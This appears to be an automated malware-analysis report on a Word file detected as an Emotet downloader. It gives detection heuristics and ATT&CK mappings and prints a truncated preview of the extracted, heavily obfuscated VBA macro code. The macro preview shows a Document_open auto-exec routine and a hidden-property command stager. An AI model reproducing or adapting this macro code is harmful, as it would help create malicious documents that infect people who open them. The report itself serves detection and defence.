MALICIOUS
262
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample contains VBA macros, including a Document_Open macro and a hidden-property command stager that uses CreateObject. ClamAV identifies the file as 'Doc.Downloader.Emotet-7465579-0', strongly suggesting Emotet family involvement. The obfuscated VBA code likely functions as a downloader for a second-stage payload, a common Emotet tactic.
Heuristics 7
-
ClamAV: Doc.Downloader.Emotet-7465579-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-7465579-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
VBA UserForm hidden-property command stager critical OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGERVBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10690 bytes |
SHA-256: 304aa0c084bb33e315603e18d924579f66af8ac51d66f8ded3c4f581e087bc4a |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Oqcpczya"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Tgkrnayc, 0, 0, MSForms, TextBox"
Private Sub Document_open()
Select Case Mroxvsnsni
Case Dndoetjf
Cpljnkokojqg = Sin(Dnlzzswmxicnx)
Loforoyllf = CStr(Dtrnwwfl)
Kgdypschz = 324
Xcvkrzje = Sin(Tvptsfvfrscvd)
Ktzgiefpcgrwc = CStr(Vgoiqkofwnhbi)
Bzrmhgkyuvofn = 567
Isbuwvhu = Sin(Wocsacxveer)
Xqkiuncebsv = CStr(Aoycufeyksi)
Srkjikdcdemn = 5645
End Select
For Kjvwhnmcj = Kmbrnycc To Lurkkblwjloh
While Ppwbsgpinhxx <> Qfjllmzpdm
Agzlncnhcx = Jufdgkmn * Atn(Feccvmta) * (Fggjicuuju + Dicqhwitzjmz)
Wend
Next
Select Case Gohbcutmpb
Case Yusfzmlnvm
Ouwwvwflivh = Sin(Izcyxegjx)
Nehrjlqtltni = CStr(Rtwfddmmxqnip)
Xdrkdiqon = 324
Enunvqfagljeu = Sin(Ahqeavslo)
Ytpbeidgyzsjv = CStr(Prxnzxew)
Xjbblcgxzr = 567
Egbanhiixv = Sin(Gbobqyuxhshyc)
Wmlwesemrl = CStr(Wozlccevkn)
Axndmycyi = 5645
End Select
For Vlzcecoxpq = Jihfwxjbjhevh To Asjbbbcd
While Zztwqpql <> Vftfaytc
Dvabnegpo = Ehcxyqfss * Atn(Hafvzdacha) * (Zezrilibwcxq + Ibhojwusnzw)
Wend
Next
Select Case Maogpdidnvhzx
Case Ceouocembji
Jteecsewaqd = Sin(Wqktdcjbkjby)
Innwgcsutqdx = CStr(Uboldvgnchg)
Ozkdflxwintw = 324
Cxuqgxuh = Sin(Qvvoulfqaldu)
Xlhslouopu = CStr(Hrzjwhqpnkp)
Widwcxhn = 567
Uqcvubbfbkee = Sin(Roweuzmwxqp)
Snxwcayfsul = CStr(Lfozxsumena)
Hgxsmgokjrdo = 5645
End Select
For Okyukifn = Yswlenawt To Shzhfhdcnkkv
While Bgspuntyq <> Jdfvrhutkwdy
Abluwnwif = Hgzuytrfn * Atn(Yhwdqcdjy) * (Ktliethyb + Ojavymdl)
Wend
Next
Ssfvvbokicf
End Sub
Attribute VB_Name = "Gqgebiwuy"
Attribute VB_Base = "0{0562E1D4-053B-47CF-9BCB-FBCBA1790242}{AEF8FBD6-8092-4120-A55C-2F111E107B74}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Znimzghmnitmj"
Function Figmhqxs()
Select Case Yfucfzfmvr
Case Xpjzsvkioklj
Kiqkfphyoj = Sin(Fqwdqyrqwe)
Snnexouk = CStr(Pxwlmjlzaakj)
Mltmsoqfjpsr = 324
Baodlmbz = Sin(Mheweyqix)
Luisicknhtug = CStr(Algydsmeozkkt)
Yjuijpfgld = 567
Mymsbvydmkk = Sin(Ghgiiyjj)
Jzxzjuevut = CStr(Fbhjouwy)
Aidhzydfahkpc = 5645
End Select
For Vojiopay = Ebyjomdv To Pwbvgspttqqzo
While Gnqzjajxgvwe <> Vhtrtnznnb
Hepkemsq = Mvbzfyvajnthy * Atn(Hvstsapcisehv) * (Medxuxquha + Rigaggoxrzx)
Wend
Next
Oqnodyhufx = Oqcpczya.Tgkrnayc
Select Case Rjrmcybynxfhz
Case Zlktkfezwncj
Ctmgslgbe = Sin(Fsouolobpjx)
Zqnjvzapeskd = CStr(Gsmyhfde)
Eibniiwfytg = 324
Xffeabzdrvkij = Sin(Qqqudyenxn)
Wffzufupsbbcd = CStr(Nmrfzflohc)
Zssirtedymvpd = 567
Soonqpmrafi = Sin(Kqxwjgvwztk)
Knarcblssatou = CStr(Bscjmnshpyf)
Qsvefreyqidg = 5645
End Select
For Sqdhoxivhqbwl = Lswfsbzeo To Fokjzcpo
While Lrrzkvledjg <> Fqgaexsmpyls
Xrygwsqzbf = Foalawtwe * Atn(Clrhewsfgqln) * (Cjscfoauw + Mdxoyxge)
Wend
Next
Xvulchkxkucla = Oqnodyhufx + Gqgebiwuy.Laoxdtqxzy + Gqgebiwuy.Cicpadkjmsazz + Gqgebiwuy.Rkkcffuyok
Select Case Rmibztuvpkrxj
Case Zyzxqstdjimc
Seykbocyei = Sin(Sshfrhncrkt)
Gxjzsmqtm = CStr(Tmhvsaurx)
Avdrepxrhkrfv = 324
Zlvjxgubmear = Sin(Qcjfgxnwbhb)
Qubhmfzbivnc = CStr(Urmexmaqi)
Ptfdjoibldgkx = 567
Lohhvdmqse = Sin(Djuamthw)
Yzgfbhdngoql = CStr(Iamwccmyul)
Rdurprasqiaq = 5645
End Select
For Nfyamshis = Luigaevbj To Toyykjvz
While Uxphztylkjkij <> Rlqdeosonmkbn
Msllrxtzalwpy = Keucsxfvvhb * Atn(Uprkdmws) * (Nyympshyuhxbf + Pahwpeqpqe)
Wend
Next
Tpxqbodccsq = Xvulchkxkucla
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.